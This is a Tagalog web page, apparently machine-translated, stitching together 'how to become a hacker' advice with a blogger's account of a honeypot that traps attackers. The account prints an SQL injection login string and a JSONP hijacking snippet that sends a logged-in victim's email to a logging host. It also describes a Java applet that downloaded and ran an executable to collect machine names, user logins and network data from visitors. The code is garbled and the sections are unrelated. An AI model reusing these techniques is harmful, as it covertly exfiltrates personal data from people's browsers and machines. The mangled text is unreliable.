Bahay / Internet / Ano ang ibig sabihin ng hulihin ang isang hacker na walang magawa? Anong mga pagkakamali ng isang hacker ang makakatulong upang mahuli siya, o kung paano hindi masunog? Sino ang naghack ng mga hacker

Ano ang ibig sabihin ng hulihin ang isang hacker na walang magawa? Anong mga pagkakamali ng isang hacker ang makakatulong upang mahuli siya, o kung paano hindi masunog? Sino ang naghack ng mga hacker

Saan ka dapat magsimula kung gusto mong matutunan kung paano kontrolin ang mga program code at cryptographic traps? Paano ka naging hacker? Pagkatapos ng lahat, madali silang makapasok sa computer ng ibang tao, na nag-crack ng ilang mga password sa daan. Walang kakaiba sa pagnanais na maging isang hacker, dahil lahat ng tao kahit minsan ay nais na tumingin sa mail o account ng ibang tao.

Sino ang mga hacker?

Kaya paano ka magiging isang hacker? Una sa lahat, kailangan mong maunawaan kung ano ang ibig sabihin ng terminong ito. Dapat tandaan na ang mga hacker ay walang pagkakatulad sa iba't ibang uri ng mga umaatake na nakikipagkalakalan sa pagnanakaw ng pera mga bank account at pag-atake ng iba't ibang mapagkukunan upang harangan ang access ng user sa kanila. Naturally, ang mga modernong eksperto sa computer ay nawala ang kanilang katayuan bilang mataas na kwalipikadong mga espesyalista sa IT. May kaugnayan sa kamakailang mga kaganapan, nagsimula silang tamasahin ang isang masamang reputasyon sa mga ordinaryong tao.


Ngunit bago ang terminong ito ay nagtago ang mga tunay na henyo sa computer na nagawang iwasto ang mga code sa mga programa batay sa kanilang sariling hindi karaniwang mga algorithm. Samakatuwid, sa pagtatanong kung paano nagiging isang hacker ang isang tao, dapat na mapagtanto ng isa ang mga layunin na kailangang makamit sa pamamagitan ng pag-master ng hindi ganap na simple at bihirang propesyon. Dapat isaalang-alang na sa kasalukuyang yugto mayroong iba't ibang uri ng mga paghihigpit sa mga batas. At hindi mo sila maaaring balewalain, dahil magkakaroon ito ng responsibilidad. Bilang karagdagan, ang pandaraya sa larangan software ay na ang sanhi ng isang malaking bilang ng mga eskandaloso kuwento. At ang mga pangunahing karakter sa kanila ay tiyak na mga hacker, na, gayunpaman, ay maaari lamang mag-claim sa mga tagumpay ng mga magnanakaw ng pera at mga lihim ng ibang tao.

Ang pag-aaral ng mga programming language ay kinakailangan

Gusto mo pa bang sagutin ang tanong kung paano nagiging hacker? Pagkatapos ay dapat mong maunawaan na walang naaangkop na paghahanda walang makakamit. Isang karera bilang isang respetadong eksperto sa larangan teknolohiya ng kompyuter at ang mga programa ay dapat magsimula sa proseso ng pag-aaral ng mga programming language. Sa kasalukuyang yugto ay medyo marami sila. Dapat itong maunawaan na mayroong mga wika na nagpapahintulot sa iyo na makipag-usap nang direkta sa mga personal na computer. Sa tulong nila, makakahanap ka ng mga solusyon sa iba't ibang uri ng problema. Upang lumikha ng mga stand-alone na programa, ginagamit ang mga modernong tool. Kasabay nito, ang network programming ay isang hiwalay na sangay ng mga code ng programa na may mga utos na magpapahintulot sa iyo na buuin ang dokumentasyon. Sa kanilang tulong, maaari ka ring mangasiwa ng maraming uri ng mga proseso sa Internet.


Sinusubukang malaman kung sino ang isang hacker, dapat tandaan na mayroong isa pang kategorya ng mga wika. Pinag-uusapan natin ang tungkol sa mga mekanismo para sa pagdidisenyo ng iba't ibang iba't ibang programa mga platform sa mga compact na device ( mga mobile phone). Sa pagsasaalang-alang na ito, kapag gumagawa ng isang pagpipilian na pabor sa isang tiyak na larangan ng aktibidad, kinakailangan upang piliin ang naaangkop na programming language. Ito ay kung saan kailangan mong ituon ang pinaka pansin.

Kahit na simpleng mga tagubilin nangangailangan ng kaalaman

Natural, para ma-hack email, sa kasalukuyang yugto maaari mong gamitin hakbang-hakbang na mga tagubilin. Gayunpaman, hindi ka nila papayagan na maunawaan kung sino ang hacker. At ang mga prinsipyo ng pagpapatakbo ng iba't ibang mga programa, pati na rin ang mga intricacies ng paglilipat ng data sa Internet, ay kailangan pa ring pag-aralan. Sa bagay na ito, dapat mo munang subukang pag-aralan ang katangian ng terminolohiya ng kapaligiran ng mga hacker at programmer. Ito ay sa pamamagitan ng mga tiyak na termino na maaari kang makipag-usap sa mga espesyalista sa computer nang walang takot sa mga amateur na walang sapat na kaalaman upang maunawaan ang isang espesyal na "wika".

Dapat pag-aralan mga operating system

Paano maging isang hacker? Ang mga aralin kung saan maaari mong pag-aralan ang bahaging ito ng aktibidad ay mangangailangan ng maraming oras, pagsisikap at pagnanais. Ano pa ang kailangan bukod sa pag-aaral ng terminolohiya at programming language? Dapat kang matutong magbasa ng mga operating system. Ang Unix/Linux ay itinuturing na isang pamilya ng hacker. Sapat na mahalagang katangian Ang mga Unix ay open source. Mababasa mo kung paano isinulat ang operating system. May pagkakataong pag-aralan ito ng maigi. Maaari ka ring gumawa ng mga pagtatangka na baguhin ang isang bagay. Bilang karagdagan, ang Unix/Linux ay nakatuon sa Internet.

Nangangailangan ng kaalaman sa internet at scripting

Upang maging isang hacker, kailangan mong maunawaan kung paano gamitin ang World Wide Web. Dapat mo ring maunawaan ang mga prinsipyo ng pagsulat ng HTML. Ang Web ay isang seryosong pagbubukod, isang mahusay na laruan para sa mga hacker. Gaya ng sinabi ng mga pulitiko, may kapangyarihan ang Internet na baguhin ang mundo. At para lamang sa kadahilanang ito ay kinakailangan upang malaman kung paano magtrabaho kasama nito.

Kung hindi ka pa natuto ng programming language, ang pagsusulat sa HTML ay makakatulong sa iyo na makakuha ng ilang kapaki-pakinabang na kasanayan. Magagamit ang mga ito kapag pinagkadalubhasaan ang mga code ng programa at ang mga prinsipyo ng pagsulat ng mga ito. Sa bagay na ito, kailangan mong matutunan kung paano gumawa ng hindi bababa sa mga home page. Dapat mo ring subukan ang XHTML. Ito ay mas maayos na idinisenyo kumpara sa klasikong HTML.

Sa teknikal, ang World Wide Web ay isang kumplikado ng mga network ng computer. Gayunpaman, sa kasalukuyang yugto ito ay isang medyo mahalagang daluyan ng komunikasyon na maaaring magamit upang maisagawa ang iba't ibang mga gawain. Dapat itong maunawaan na ang mga hacker ng Russia ay kinakailangang malaman ang Ingles. Ito ay dahil sa malaking halaga ng impormasyon na magagamit lamang sa wikang ito.

Dapat walang monotony

Ang pagiging isang espesyalista sa larangan ng mga computer, mga programa at ang World Wide Web ay isang malaking kasiyahan. Gayunpaman, mangangailangan ito ng maximum na pagsisikap. Alinsunod dito, kailangan ang motibasyon. Upang maging isang hacker, kailangan mong tamasahin ang proseso ng paglutas ng mga problema habang hinahasa ang iyong mga kasanayan at sinasanay ang iyong katalinuhan. Ang mga espesyalista sa antas na ito ay hindi kailanman nababato sa pag-aaral ng maraming mga wika at programa sa loob ng mahabang panahon at maingat, at ang trabaho ay hindi mukhang monotonous sa kanila. Ginagawa nila ang gusto nila.

Paano maging isang hacker? Isang hanay ng mga programa (mga operating system, programming language, open source, atbp.), kaalaman sa wikang Ingles, ang pagnanais na maunawaan ang isang bagong bagay - lahat ng ito ay makakatulong sa pagkamit ng iyong mga layunin. Ngunit ano pa ang dapat mong tandaan?

  • Hindi namin dapat kalimutan na upang maging isa sa mga pinakamahusay sa iyong negosyo, kailangan mo lamang lutasin ang pinakamahihirap na problema. Hindi mo kailangang magkaroon ng labis na pagpapahalaga sa sarili. Kailangan mo lang magtakda ng mga layunin para sa iyong sarili at bumuo araw-araw. Kung ang isang bagay ay hindi malinaw ngayon, pagkatapos bukas ay dapat mong subukang maunawaan ang kumplikadong isyu. Kung ang isang bagong kasanayan ay hindi natutunan, malamang na ang araw ay nasayang. Hindi ka dapat gumawa ng anumang pabor sa iyong sarili.

  • Hindi lahat mga espesyalista sa kompyuter ay pareho. May mga interesado lang kumita. May mga nagsusumikap para sa kaalaman at impormasyon, kung minsan ay lumalabag sa batas. Ngunit lahat ng celebrity hackers ay may iba't ibang layunin. Ito ang nagpapahintulot sa kanila na makamit ang mga makabuluhang taas sa kanilang propesyon.
  • Bilang isang baguhan, hindi mo dapat subukang i-hack ang malalaking korporasyon o ahensya ng gobyerno. Dapat itong maunawaan na ang mga taong responsable para sa seguridad ng mga sistemang ito ay malamang na mas naiintindihan ang kanilang negosyo. Dapat tandaan na ang mga naturang espesyalista ay hindi tutugon kaagad kahit na may nakitang panghihimasok. Maghihintay muna sila hanggang sa seryosong umatake ang hacker. Sa madaling salita, maaaring makaramdam ng ligtas ang isang baguhan pagkatapos ng isang hack sa pamamagitan ng patuloy na pagsisiyasat sa mga system, halimbawa, para sa mga kahinaan. At sa oras na ito, aktibong hinihikayat sila ng mga espesyalista sa isang bitag.
  • Kinakailangang patuloy na mapabuti sa pamamagitan ng pag-aaral ng dalubhasang panitikan.
  • Konklusyon

    Batay sa lahat ng nasa itaas, makakagawa tayo ng konklusyon. Dapat nating patuloy na pag-aralan ang iba't ibang disiplina, wika, panitikan, at Internet. Walang gaanong hacker. Samakatuwid, upang maging isa sa kanila, dapat mo munang ihanda ang iyong sarili para sa maingat at mahabang trabaho una sa lahat sa iyong sarili. Gayunpaman, kung mula pagkabata ay hindi mo nagustuhan ang paglutas ng mga lohikal na problema, dapat mong subukang maghanap ng isa pang aktibidad para sa iyong sarili na hindi nangangailangan ng brainstorming, maximum na tiyaga at seryosong pasensya.

    Paano maging isang hacker mula sa simula

    Ang trabaho ng isang propesyonal na hacker ay lubhang kawili-wili. Mga hack sa website, pagnanakaw mahalagang impormasyon, pagnanakaw ng pera, pagtagos, pagsisiwalat ng mga lihim. Ang mga posibilidad ng isang tunay na hacker ay walang katapusan. Kung tungkol sa kanyang pangalan, ito ay maingat na itinago.

    Ang mga kabataan ay naaakit sa mga aktibong aktibidad sa pagnanakaw ng impormasyon at pag-hack ng mga website. Ngunit hindi nila isinasaalang-alang na para sa mga naturang aksyon ay madalas nilang kailanganing sagutin sa harap ng batas.

    Ang trabaho ay hindi palaging nagsasangkot ng mga ilegal na aktibidad, at ito ay isang katotohanan. Kung gusto mong magtrabaho sa larangan ng kompyuter, gagamitin ng malalaking kumpanya ang iyong mga serbisyo. At hindi nakakagulat, dahil ang hacker ay isang first-class na espesyalista sa IT.


    Tulad ng mga palabas sa pagsasanay, ang mga korporasyon at malalaking bangko ay nais ng isang propesyonal na hacker sa kanilang mga tauhan. Pinoprotektahan ng mga organisasyon ang mahalagang impormasyon gamit ang teknolohiya ng computer, at nagagawa ng isang espesyalista na makakita ng mga butas sa seguridad at maiwasan ang pagnanakaw ng data.

    Tanging pag-unlad ng sarili ang tutulong sa iyo na makahanap ng isang propesyon. Magbabahagi ako ng ilang mga tip, at sa kanilang tulong ay lalapit ka sa iyong pangarap, at marahil ay mapagtanto ito.

    Hakbang-hakbang na plano ng aksyon
  • Pangunahing Kasanayan. Una sa lahat, kilalanin ang Internet, alamin ang kahulugan ng iba't ibang mga heading, matuto ng maraming pangunahing konsepto at maunawaan ang pakikipag-ugnayan ng mga browser sa mga server.
  • Mga wika sa programming. Bigyang-pansin ang pag-aaral ng mga programming language. Sa tulong ng mga tutorial, na sagana sa Internet, alamin kung paano magsulat ng mga simpleng programa. Sa kaunting pagsusumikap, makakabisado mo ang mga kasanayan sa programming, at sa hinaharap magkakaroon ka ng pagkakataong pagbutihin ang mga ito.
  • Kung nangangarap kang magtrabaho bilang isang hacker, bigyang-pansin ang pag-aaral ng hypertext markup language na tinatawag na HTML.
  • Ingles. Hindi mo magagawa nang walang alam sa Ingles. Ang wikang ito ay ginagamit ng lahat ng serbisyo sa mundo. Samakatuwid, ang pagmamay-ari nito ay isang kinakailangan.
  • Ang apat na puntos na nakabalangkas ay tutulong sa iyo na makabisado ang mga pangunahing kasanayan. Matapos makumpleto ang gawain, simulan ang pag-aaral ng mga propesyonal na isyu at ang mga intricacies ng pag-hack. Sa kabutihang palad, ang Internet ay puno ng impormasyon na may kaugnayan sa paksa ngayon.

    • Pahalagahan ang iyong oras at mga kasamahan. Siguraduhing ibahagi ang iyong mga tagumpay sa iyong "mga kapatid sa bisig."
    • Igalang ang code. Ang mga hacker ay may sariling code, na nagbabawal sa pagbibigay o pagkuha bilang kapalit. Kung nagawa mong i-hack ang programa ng ibang tao, ipaalam sa may-ari upang magawa niyang protektahan ang kanyang utak.
    • Tanggalin ang mga stereotype na kaisipan. Ang isang hacker ay hindi dapat mag-isip sa mga stereotype. Dapat ay may kakayahan siyang mabilis at laging makahanap ng mga sagot.
    • Humingi ng payo. Kung may hindi malinaw, huwag mag-atubiling humingi ng payo sa isang pampakay na forum. Kung ikaw mismo ang nalutas ang problema, ibahagi ang algorithm ng solusyon sa iyong mga kasamahan. Ganun din ang gagawin nila sa hinaharap.
    • Pagmasdan ang teknolohiya. Ang computer ay isang buhay na organismo at isang malapit na kaibigan ng isang IT specialist. Samakatuwid, ang mga kagamitan sa kompyuter, mga nakatigil na sistema, mga laptop o netbook ay nangangailangan ng pangangalaga.

    Mabilis na abutin ang iyong layunin kung ang iyong pangkat ng mga kaalyado ay mapupunan ng tiyaga at libreng oras. Araw-araw kailangan mong matuto ng bagong impormasyon, na magdadala ng karanasan.

    Mga tip sa video


    TUNGKOL SA mga laro sa kompyuter Mas mabuting kalimutan. Gumugol ng iyong libreng oras sa pagkakaroon ng kaalaman na magiging kapaki-pakinabang sa hinaharap. Siguraduhing basahin ang Criminal Code upang maiwasan ang isang hindi kasiya-siyang sitwasyon.

    Paano maging isang hacker kung saan magsisimula

    Sa pagpapatuloy ng tema ng artikulo ngayon, isasaalang-alang namin ang mga pangunahing yugto ng pagsasanay upang malaman nang detalyado kung saan magsisimulang maging isang hacker.

    Sa mga tampok na pelikula, ang mga hacker ay nagha-hack ng mga sistema ng pagbabayad, mga website ng pamahalaan, malalaking organisasyon at mga pasilidad na pang-industriya. Ang pangunahing layunin ng pag-hack ay mahalagang impormasyon o pera. Sa katotohanan, ang lahat ay hindi gaanong simple.

    Ang hacker ay isang ordinaryong programmer na may kakayahang mag-crack ng software code. Gayunpaman, mayroon siyang iba pang mga layunin. Hindi niya hinahangad na makakuha ng mahalagang data at ibenta ito para sa malaking pera sa black market. Sa panahon ng pag-hack, nakikilala ng isang espesyalista ang prinsipyo ng pagpapatakbo ng isang partikular na programa, pinag-aaralan ang code upang makahanap ng mga butas, at lumikha ng isang analogue o katulad na programa.


    Itinuturing ng maraming tao na ang mga hacker ay mga kriminal na nagha-hack at sumisira, kaya may mga "espesyalista" na hindi mga hacker, ngunit sinusubukang manguna sa isang katulad na pamumuhay. Kahit na ang isang baguhan ay maaaring makapinsala sa isang website o computer kung siya ay gumagamit ng isang malisyosong script na nagkukunwari sa sarili bilang isang programa at inilagay sa mga website.

    Sa totoong buhay, ang pakikipagtagpo sa isang tunay na propesyonal sa larangang ito ay may problema. Ang isang bihasang hacker ay hindi kailanman magsasabi sa iyo kung ano ang kanyang ginagawa. Mag-isa siyang nagtatrabaho dahil alam niyang may kaparusahan ang naturang aktibidad.

  • Maging matiyaga. Napagtanto na ang pag-master ng mga kasanayan ay aabutin ng maraming taon.
  • Bigyang-pansin ang pag-aaral ng inilapat na matematika. Maniwala ka sa akin, kung walang kaalaman sa matematika hindi mo magagawang maging isang hacker.
  • Tiyaking bumili ng mga aklat na nakatuon sa pagpapatakbo ng mga program, software platform, at mga sistema ng seguridad.
  • Matutong magsulat ng code at gumawa ng mga naka-encrypt na system nang walang tulong mula sa labas. Ang trabaho nang walang mga kasanayang ito ay imposible.
  • Magbasa ng mga pampakay na magazine, bisitahin ang mga website at forum na nakatuon sa mga aktibidad sa pag-hack. Ang mga mapagkukunan ng impormasyon ay makakatulong sa pagpapaunlad ng sarili.
  • Magtago ng diary. Itala ang mga istatistika ng mga tagumpay at tagumpay. Sa paglipas ng panahon, mapapansin mo na ang iyong mga kasanayan ay naging mas advanced.
  • Maging handa para sa katotohanan na ang pag-aaral sa bahay ay magiging mahaba at nangangailangan ng maximum na pagsisikap. Ito ang tanging paraan upang masakop ang mga taluktok at masira ang mga stereotype. Tandaan, dapat kang kumilos ayon sa batas.

    Video

    Umaasa ako na ang kuwento ay makakatulong, at ikaw, na pamilyar sa materyal, ay mabilis na makakamit ang tagumpay.

    Huwag kalimutan na ang paglikha o pagbabago ng mga programa na humahantong sa iligal na pagkopya, pagharang o pagsira ng mahalagang impormasyon ay isang parusang krimen. Para sa mga naturang aksyon maaari silang makulong ng 3 taon at magmulta ng isang maayos na halaga.

    Higit sa isang beses ay nahaharap ako sa mga tanong mula sa mga user tungkol sa kung posible bang matukoy ang hacker na nag-hack dito o sa site na iyon. Ang tanong ay medyo kawili-wili at imposibleng magbigay ng malinaw na sagot dito. Siyempre, ang lahat ay nakasalalay sa mga kwalipikasyon ng taong nagsasagawa ng pag-atake at sa kanyang pag-iingat. Ngunit sa pagsasagawa, maraming mga hacker ang gumagawa ng mga hangal na pagkakamali at ibinubunyag ang kanilang hindi pagkakilala. Tingnan natin kung paano.

    Una sa lahat...bakit kailangan ko ito? Hindi ako “three-letter guy”, ngunit isang mahinhin na inhinyero, wala pa akong planong sakupin ang mundo at hindi ako kasali sa iba pang walang prinsipyong mga bagay, kaya bakit hindi ko nagustuhan ang anonymity? Ang sagot ay simple - anonymous, hacker, script kiddies... Ang mga taong ito ay palaging sinusubukang sirain ang isang bagay, magnakaw, manira o magmaneho ng kanilang emergency. Ang bagay na ito, kung iisipin mo, ay hindi naman masama (mas mabuti ito kaysa magpakasawa sa droga sa eskinita), ngunit dahil ang mga lalaki ay mahilig maglaro, makipaglaro tayo sa kanila.

    Ang kanilang hindi pagkakilala ay hindi isang sagradong bagay, kaya maaari mong labanan ito 8) Ngunit bilang isang pangkalahatang resulta, ang lahat ng ito ay gumagana sa sinumang gumagamit ng Internet, nag-apply lang ako ng mga pagsisikap nang eksklusibo laban sa mga umaatake, ang mga nagsisikap na makakuha ng hindi awtorisadong pag-access at lumalabag sa Artikulo 272 ng Criminal Code ng Russian Federation. Bilang karagdagan, ang aking karanasan ay magiging isang kawili-wiling paglalarawan ng paksa ng "counterattacks" sa mismong mga umaatake awtomatikong mode nang walang interbensyon ng tao. Ang resulta ng counterattack ay ang pagbubunyag ng impormasyon tungkol sa umaatake, na, makikita mo, ay isang magandang bagay, hindi isang masamang bagay...

    Barrel ng pulot

    Upang hindi masira ang hindi pagkakakilanlan ng mga inosenteng mamamayan at upang kontrahin lamang ang "mga kontrabida," kailangan mong tiyakin na ang gumagamit na pinag-uusapan ay isang hacker. Upang gawin ito, sapat na magkaroon ng isang sistema para sa pagsusuri ng pag-uugali ng bisita na may mekanismo para sa pag-detect ng mga aksyong "pag-atake". Sa madaling salita, ang kailangan mo lang gawin ay gumawa ng honeypot. Para magawa ito, hindi mo kailangang mag-deploy ng honeyd, atbp. Halimbawa, para sa pangkalahatang kaso na may mapagkukunan ng WEB, sapat na maglagay ng isang pseudo-working na script sa production server, na magkukunwaring kapaki-pakinabang at gumagana, ngunit sa katunayan ay makakakita ng mga pagtatangka sa pagtagos at, sa kaso ng isang "matagumpay" na pag-atake, ay magpapanggap na ang hack ay isang tagumpay. Pagkatapos nito, magsagawa ng counter-attack sa partikular na user na iyon.

    Isang magandang halimbawa, gumawa tayo ng script admin.php o /admin/, hindi mahalaga, mahahanap ng sinumang umaatake sa sarili ang URI na ito sa loob ng ilang segundo, isa itong malinaw na hakbang. Kung gusto mong dagdagan ang atensyon ng mga hindi gustong elemento sa bitag, maaari kang maglagay ng link home page(sabi nila narito ang admin), dahil ang pangunahing gawain ay para sa masamang tao na simulan ang pag-atake sa honeypot muna, at hindi poking sa paligid sa mga normal na script.

    Sa pseudo-admin script, malinaw naman, humihingi sila ng login at password. Susunod, ito ay isang bagay ng pantasya, maaari mong hintayin ang umaatake na pilitin ang password o tularan ang isang kahinaan ng klase ng SQL Injection, at pagkatapos ay magagawa ng anumang password ng klase. ‘o 1=1/*, na magbibigay ng access sa “admin panel”. Kasabay nito, maaari kaming mangolekta ng mga istatistika - kung paano na-hack ang admin panel, sa pamamagitan ng pagpili o sa pamamagitan ng SQLi. Buweno, hindi na kailangang sabihin - sinumang makapasok sa "panel ng admin" ay isang "masamang" tao, at ang kanyang pagsisiwalat ng kanyang hindi pagkakilala ay hindi nagdudulot sa akin ng mga problema sa moral.

    Sa totoo lang, noong 2011, nag-post ako ng ganoong script sa aking website at nagsimulang maghintay... Hindi ako naghintay ng matagal, dahil ang site ay nakatuon sa paksa ng seguridad ng impormasyon, ang bilang ng mga taong gustong i-hack ito ay lumampas sa lahat. imahinasyon.

    Tinamaan ako sa noo

    Malinaw, sa pinaka-pangkalahatang kaso, ang lahat ng mayroon kami tungkol sa isang bisita sa website (at umaatake, sa aming partikular na kaso) ay isang IP address lamang, User-Agent, atbp. Gaya nga ng sabi ko, hindi kami CIA/FSB/MOSSAD... wala o PRISM, at naiintindihan namin na ang IP address (binigay sa iba't ibang Proxy server at TOR doon) ay WALA talaga. Ito ang haharapin natin sa karamihan ng mga kaso, ngunit kung maglalaro tayo ng isang banayad na sikolohikal na sandali (partikular tungkol sa script kiddies), lumalabas na ang mga taong ito ay hindi umaasa ng isang trick! Sa madaling salita, sa katawan ng "admin panel" maaari kang gumawa ng anuman - magsabit ng isang spoil pack, halimbawa, at pindutin ang mga taong walang ingat sa pamamagitan ng mga pagsasamantala. Ngunit naglaro ako ng mas "flatly", inilunsad ko ang Java Applet. Tulad ng, napatotohanan ka... narito ang aming panel ng GUI sa Java.

    Isang elemento ng social engineering - ang isang attacker, sa isang akma ng kagalakan mula sa isang matagumpay na pag-atake ng SQLi, ay maaaring nakakatuwang maglunsad ng isang applet. At... Nagulat ako, ngunit sapat na sa kanila (siyempre, sa paglaon, sa paglipas ng panahon, bumaba ang porsyento ng pagtagos, dahil ang impormasyon tungkol sa pag-setup ay mabilis na kumalat sa isang makitid na bilog ng mga espesyalista;). Actually ang applet jerked stupidly EXE na file mula sa server at inilunsad ito.

    Kinokolekta ng EXE file ang NON-PERSONAL na data (oo, oo, sinusunod ko ang Pederal na Batas sa Personal na Data...), tanging ang sumusunod na impormasyon: lokal na IP, traceroute mula sa network, pangalan ng makina, login ng user. Ito ay hindi gaanong, ngunit sa karamihan ng mga kaso ito ay sapat na upang i-bypass ang TOR/Proxy/VPN at kahit na malaman ang pangalan ng umaatake! Bukod pa rito, siyempre, posibleng mangolekta ng BSSID ng mga nakapaligid na access point, halimbawa, at kumuha ng mga larawan mula sa webcam ng laptop, mag-parse ng mga config file mula sa turnilyo, atbp., atbp. Sa madaling sabi, ang punto ay sa pamamagitan ng pag-install ng isang "counter-intelligence agent" sa PC ng umaatake, nalampasan namin ang maraming mga hadlang, at wala na sa negosyo ang TOR at Proxy. Isang halatang kontra-atake.

    Tandaan: wala ang aking ahente malayuang pag-access, bagama't teknikal na maaari itong ma-code, hindi ko gustong mag-backdoor at magkalat ng malware. Ang ahente na ito ay hindi nakakahamak, dahil nakolekta ito ng puro teknikal na impormasyon tungkol sa PC ng umaatake at sa kapaligiran ng network nito. Sa pamamagitan ng paraan, ang lahat ng data ay ipinadala sa pamamagitan ng isang reverse DNS channel, na nagpabuti ng matagumpay na "pag-tap" gamit ang data - http://www.xakep.ru/post/55661/.

    1) Ministri ng Depensa ng Russian Federation

    Isa sa mga unang sumubok na gumamit ng SQLi type attack ay ang mga lalaki mula sa EXTERNAL IP ng Ministry of Defense Russian Federation. Sa kabutihang-palad para sa akin, hindi sila nahulog sa applet, o mayroon silang Linux (dahil kailangan kong magdagdag ng cross-platform functionality). Alam kong may mabubuting tao doon at, siyempre, wala silang masamang ibig sabihin! Ngunit umaasa ako na sa mga tunay na "pagpapatakbo ng katalinuhan" ay gumagamit sila ng hindi bababa sa mga Chinese proxy server 😉

    2) Kumpanya ng antivirus

    Ginawa ang paglulunsad na ito gamit ang virtual machine kumpanya ng antivirus. Sinunog ng DNS server at tracert ang opisina 8) Kapansin-pansin na hindi idinagdag ng mga lalaki ang ahente sa listahan ng malware! Pinahahalagahan. Salamat guys!

    3) Isang grupo ng mga lalaki

    Isang grupo lamang ng iba't ibang mga lalaki, ang ilan ay alam ang tungkol sa tampok at naglaro lamang, ang ilan ay hindi (http://habrahabr.ru/post/122107/#comment_4003842)

    4) At ang pinaka-kagiliw-giliw na bagay ay ang Host na pag-aari ng INTELLIGENCE ng isa sa mga bansa ng CIS. Sa "reverse" penetration.

    Noong una ay nagpasya ako na ito na, nagsimula na ang cyber war! Bilang resulta ng isang counter-attack, ang aming ahente ay napunta sa isang host na kabilang sa intelligence service ng ibang estado. Ang account lang ang lumilitaw na isang account ng serbisyo, na nagmungkahi na ang host ay nakompromiso at ginagamit bilang isang tagapamagitan. Maya-maya sa araw ding iyon, nakatanggap kami ng pag-install ng pangalawang "ahente" mula sa parehong bansa, ngayon lang hindi mula sa network ng ahensya ng gobyerno, ngunit mula sa isang PC sa bahay. Ang PC username ay naging madali sa Google at ang pagkilala sa tao ay lumabas nang walang anumang problema. Kasabay nito, kung isasaalang-alang ang mga "coincidences" na ito, maaari nating sabihin na nagtatrabaho siya para sa serbisyong ito ng paniktik, o kahit papaano ay nakakuha ng access sa isang host ng gobyerno.

    Pinsala sa pamamagitan ng pagsisikad

    Okay, naiintindihan namin na ang pinakasimpleng paraan upang ipakita ang anonymity ay ang counterattack sa pamamagitan ng mga exploit pack o gamit ang mga elemento ng SI, ngunit ito ay makapal at halata. Ngunit may isa pang ideya - mga serbisyo ng third-party gaya ng webmail o, halimbawa, social media. Maaari mong gawing mas invisible ang pag-atake... na ginawa ko 8)

    Oo, bilang karagdagan sa applet, sa kaganapan ng isang matagumpay na pag-atake sa akin, nalaman ko ang e-mail ng umaatake upang malaman nang eksakto "sino ang dapat sisihin" (well, kung ano ang gagawin ay malinaw na ..). At muli, ang anonymity ay hindi TOR/VPN/Proxy chain. Ito ay hindi sapat! At kaya ang kakanyahan ay simple, kung ang isang mamamayan ay gumagamit ng mga serbisyo tulad ng VKontakte, yandex, google, linkedin, twitter, facebook, atbp... at sa parehong oras siya ay patuloy na napatunayan sa kanila, kung gayon kung mayroong anumang mga kahinaan () sa ang mga serbisyong ito, ang IYONG anonymity ay mabubunyag. Nagkataon na ang mga kahinaan ay natagpuan sa mga serbisyo ng mail.ru at yandex.ru (matagal ko nang iniulat ang mga ito, at matagal na silang na-patch, gayunpaman, nagawa kong subukan ang mga ito para sa kapakanan ng aking "pang-agham ” eksperimento sa praktikal na paghuli sa mga masasamang tao...). Ang pinakakaraniwang kahinaan (sa parehong mga serbisyo): JSONP Hijacking. Ang kakanyahan ay simple, mayroong isang tiyak na serbisyo:

    mail-service.com/ajax?callback=func

    Alinsunod dito, upang samantalahin ang puwang na ito at ipakita ang hindi pagkakilala, ginagamit namin ang sumusunod na code:

    function func(obj) ( var url="http://loger.com/log.php?value="+obj["e-mail"]; $.get(url); } !}

    function function(obj)

    var url = "http://loger.com/log.php?value=" + obj ["e-mail" ] ; !}

    $. get(url);

    < script src = "http://mail-service.com/ajax?callback=func" / >

    Kaya tandaan: maaari mong kalimutan ang tungkol sa TOR/VPN kung palagi kang nasa social media. hindi na kailangan ng mga network na magkaroon ng "pipi" na CSRF/XSS para masubaybayan kung sino ka at saan ka nanggaling.

    Karaniwang umaatake:

    At isa pa...

    Sa pamamagitan ng paraan, bilang isa pang halimbawa ng diskarteng ito, ang linkedin network ay hindi nangangailangan ng isang kahinaan, ito ay isang tunay na tampok - isang log ng mga tumingin sa iyong profile. Iyon ay, kung may katangahan akong naglagay ng redirect sa isang espesyal na nakarehistrong linkedin profile sa aking admin panel:

    Bilang resulta, maaari naming malaman ang higit pang impormasyon tungkol sa mga umaatake nang direkta sa Linkin:

    Sa pamamagitan ng paraan, maaari mong mapansin na ang SAMEORIGIN ay hindi nakakatulong, dahil GET kahilingan pumasa bago suriin ng browser ang patakarang ORIGIN, ang pagsusuri ay nangyayari pagkatapos 😉

    Mga istatistika

    Sa wakas, ilang mga istatistika. Ang eksperimento ay tumagal mula Q2 2011 hanggang Q3 2012.

    Kabuuang NATATANGING pag-atake ng SQLi - 484 (para sa ~1.2 taon)

    Sa mga ito, matagumpay na kontra-atake (Java Applet) - 52 (sa ~1.2 taon)

    Sa mga ito, mayroong 16 na matagumpay na kontra-atake sa mail.ru/yandex.ru (mahigit sa 6 na buwan)

    ~17% rate ng tagumpay na may mga counterattacks.

    Grap ng dependency:

    Tulad ng nakikita mo, sa simula ay mayroong isang applet, at idinagdag ko ang "sabon" sa ibang pagkakataon. Ang mga pinakamataas na dumalo ay nauugnay sa mga anunsyo ng ZeroNights at Defcon group meeting. Ang pagsira sa mail ay talagang linear, samantalang sa kaso ng mga applet, ang dependence ay linear lamang sa simula ng eksperimento. Ito ay dahil sa mga pag-update ng Java; pagkatapos ay idinagdag ng mga antivirus ang applet sa database ng malware (na hindi nakakagulat dahil ito ay naipon mula sa isang metasploit payload)

    P.S. Sa pamamagitan ng paraan, kung sa yandex.ru mayroong isang lugar upang iulat ang mga bug na nahanap ko, pagkatapos ay sa kaso ng mail.ru hindi ako nakahanap ng mga contact hanggang sa nakilala ko ang lokal na espesyalista sa seguridad at personal na na-leak ang bug sa kanya...

    Mga konklusyon

    Bagama't ang post sa blog na ito ay higit pa tungkol sa kung paano ko nahuli ang mga "masamang" tao, bagama't sa katunayan maaari itong i-extrapolate sa mga isyu ng hindi pagkakilala sa Internet - kung ang mga espesyalista sa IT/IS at mga hacker ay nasusunog, paano naman ang mga normal na tao? Halatang halata na ang TOR/Proxy at VPN ay hindi nakakatulong sa bagay na ito. Ang isang pag-login sa isang social network, kawalan ng pansin, at marami pa ay sapat na upang malinaw na itugma ang isang bisita sa isang mapagkukunan ng web sa isang tunay na tao. Mag-ingat at JFYI: Paano gumagana ang mga totoong evil hack

